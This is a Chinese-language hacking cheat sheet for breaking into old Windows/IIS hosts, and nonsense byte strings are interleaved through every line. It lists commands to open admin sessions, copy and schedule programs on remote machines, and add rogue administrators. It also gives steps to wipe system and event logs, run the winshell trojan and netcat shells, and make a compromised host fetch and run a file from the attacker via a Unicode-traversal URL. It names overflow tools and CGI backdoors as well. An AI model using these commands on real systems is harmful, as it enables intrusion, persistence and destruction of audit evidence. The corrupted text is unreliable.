网管和黑客都必须知道的命令
�F��\KjEl0 常用的几条NET命令:
,JAx
?�X�b !�dyXJ�Q� (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
�2�^h��27A �Br1&8L-|% (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
RP[{4��Q8� K1 Eyn�U
I (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
}�wr{�W�:j BJ$9v�bhZN (查看远程主机时间) net time \\IP地址
��
M+||rct P�g,b-W?n* (定时启动某个程序) at \\IP地址 02:18 readme.exe
[�uC�]*G] �r`W)�0oxD (查看共享) net view \\IP地址
3!XjtVhK?I #@YPic"n7` (查看netbios工作组列表) nbtstat -A IP地址
R�!\�_rc1/ uwzvb�gup? (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
�H�HDl8�lo ]m
g)Q�:d, (这两条把自己增加到管理员组): net user 用户名 密码 /add
x�+��Ttl4� y"bByd|��6 net localgroup Administrators 用户名 /add
�*s�c�V�J� Aw�$x��;3y (断开连接) net use \\IP地址\ipc$ /delete
^t`� k0<�� }zkH�JxZgE 扫尾:
K2�M~-�S3 {���MtpkUN del C:\winnt\system32\logfiles\*.*
;X�?}�x%$ R� "��n�5� del C:\winnt\ssytem32\config\*.evt
�h`K�FL/fT [Y|8\Ph`& del C:\winnt\system32\dtclog\*.*
|n+qM��ql' �_���"?�.! del C:\winnt\system32\*.log
-I�*^-�+>H 77C'*tt1�] del C:\winnt\system32\*.txt
t2�/�#�&J] u$DHV�RrF< del C:\winnt\*.txt
$�7O�}S�.x sD��{W�xv del C:\winnt\*.log
\��J�x04[= Lm*e�5J�nV 一、netsvc.exe
?k]2*�}bz �d/PiiiFf, 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
"$�#xK�|�t f��!\l��g� netsvc /list \\IP地址
<�'q��eXgi ��9>l*l�CA netsvc schedule \\IP地址 /query
-}nxJH��)� �S�|SV$_
( netsvc \\IP地址 schedule /start
o)Iff�)m$� 4" C�b/�y3 二、OpenTelnet.exe
�ock�Te�5U ��9!6��f-K 远程启动主机的Telnet服务,并绑定端口到7878,例如:
f%S��Zg!+t PPb��7%2�r OpenTelnet \\IP地址 用户名 密码 1 7878
k�DE�Ps�$^ ��?3n��R�� 然后就可以telnet到主机的7878端口,进入DOS方式下:
h]Wr�� �[v �� 'C`U"I� telnet IP地址 7878
���O{��QA� HBy[F�Y�a4 三、winshell.exe
�S��Q��44 d:��#y��EC 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
J3e�96t~u� M�$�y+q�
^ p Path (查看winshell主程序的路径信息)
s8y�wKT�R- fm��Q_P.�c b reBoot (重新启动机器)
/M|2���62% �:�yRo3c� d shutDown (关闭机器)
xDG2w�s=@D 5"CZh�.J� s Shell (执行后你就会看到可爱的“C:\>”)
p~S�ClaR3H U�}6B*Xx'� x eXit (退出本次登录会话,此命令并不终止winshell的运行)
�dY�G,_ji� �[0(B>�a3J CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
�qAAX�;��N 419�x+�3>} 四、3389登陆器,GUI方式登录远程主机的
|u�X,5Q#6� >�[�9�J�?H 五、elsave.exe
0O9Ni='�Tn 43|XSy�S�� 事件日志清除工具
>h�P�QR��d ,V�CyG:dw� elsave -s \\IP地址 -l "application" -C
TOkp%@9/� �f({Ei`��| elsave -s \\IP地址 -l "system" -C
Hw7;;HK
7 'JCZ��]pZ elsave -s \\IP地址 -l "security" -C
�VRI0�W`� >d,jKlh^.% 执行后成功清除应用程序日志,系统日志,安全日志
wC�r(D>iM� o<[#0T^K � 六、hbulot.exe
Jl5c���
[F M��!/�Cknm 开启win2kserver和winxp的3389服务
I$�<<(V�WH ��C1��jHz� hbulot [/r]
+_; l|uhT; -�db�_E�#� 使用/r表示安装完成后自动重起目标使设置生效。
/��JHc�!�D eCqHv�M��p 七、nc.exe(netcat.exe)
b\3�Oy�p>� :�<hXH^�n� 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
()5�[x.xK@ )+[ gd/<C. 想要连接到某处: nc [-options] hostname port[s] [ports] ...
^su<u��G<R +�A�f"f' ) 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
%�/�|9@e�r �:pGaFWkvO 参数:
"�t�(p&;d� #
WAZ9�,t� -e prog 程序重定向,一旦连接,就执行 [危险!!]
Y�"~gw~7OD |�$vX<. S� -g gateway source-routing hop point[s], up to 8
/�W�>�iJfx pi
Z[Y
5OE -G num source-routing pointer: 4, 8, 12, ...
�np8gKV��D ���PcA2/!a -h 帮助信息
5�Ow[~p"l< <,[cQ �I/� -i secs 延时的间隔
�K
�P�Oa|$ d��o�*EKo� -l 监听模式,用于入站连接
<�kGU,@6PF %kS�(LlL+6 -n 指定数字的IP地址,不能用hostname
�\6�R,Nq� ^>j���w�h� -o file 记录16进制的传输
NW�M���FtT \.-}adKg�� -p port 本地端口号
�q3�5�f&O; %Z)��:>�' -r 任意指定本地及远程端口
�\QYF�A�a� p-Kz-+A��[ -s addr 本地源地址
j`����~Ms> sg�$rzT-S4 -u UDP模式
/a��tW8 `& �^; )8VP�6 -v 详细输出——用两个-v可得到更详细的内容
#vti+A~n,4 �aqj@Cjk4Z -w secs timeout的时间
@cFJeOC|�� �(���oEC6F -z 将输入输出关掉——用于扫描时
uTKD 4yig� 八、TFTPD32.EXE
:�9QZ�PsL� L��)�@?e?9 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
v^d]~���!h �3E!|<q$�z http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
j$?{\iXZ� OmIg<v�0\; 然后可以直接令文件运行:
�]��pH�-2_
TU:7D��f� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
�m^� tFi7c 5h�Q�E4/hH 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
p<�,*3h�uj Q9Kve3u-i� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
Yo��BPLS`K � UA4�8Ug� 一、一 Xscan命令行运行参数说明:
j4|N-���:� {L/��tst#C 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
HY�&aV2|A1 j��R�J��n+ 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
�W-?�()dX{ -f%������' xscan -file <主机列表文件名> <检测项目> [其他选项]
$a
]_�w.�@ @?yX!��_YC 其中<检测项目> 含义如下:
!cO]<�CWPq BD_Iz A<wK -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
�m�Oy^vMa� wr��$M$i:� -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
`*_�mP<Ag� PIu1+k.�r? -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
1(�I�6.BHW +nXK-g;)' -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�?�[g=F <r lI�*o@w�Qg -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
mS(f�gq6� }�<@b=�_>S [其他选项] 含义如下:
���>q�S9PX `6lr4Kk @R -v: 显示详细扫描进度
ts\5uiB<�% �}1Gv�)l�7 -p: 跳过Ping不通的主机
'EbWFMj�y qf!p 9@4F[ -o: 跳过没有检测到开放端口的主机
9N@W�\D�T� kC��R_tn
4 -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
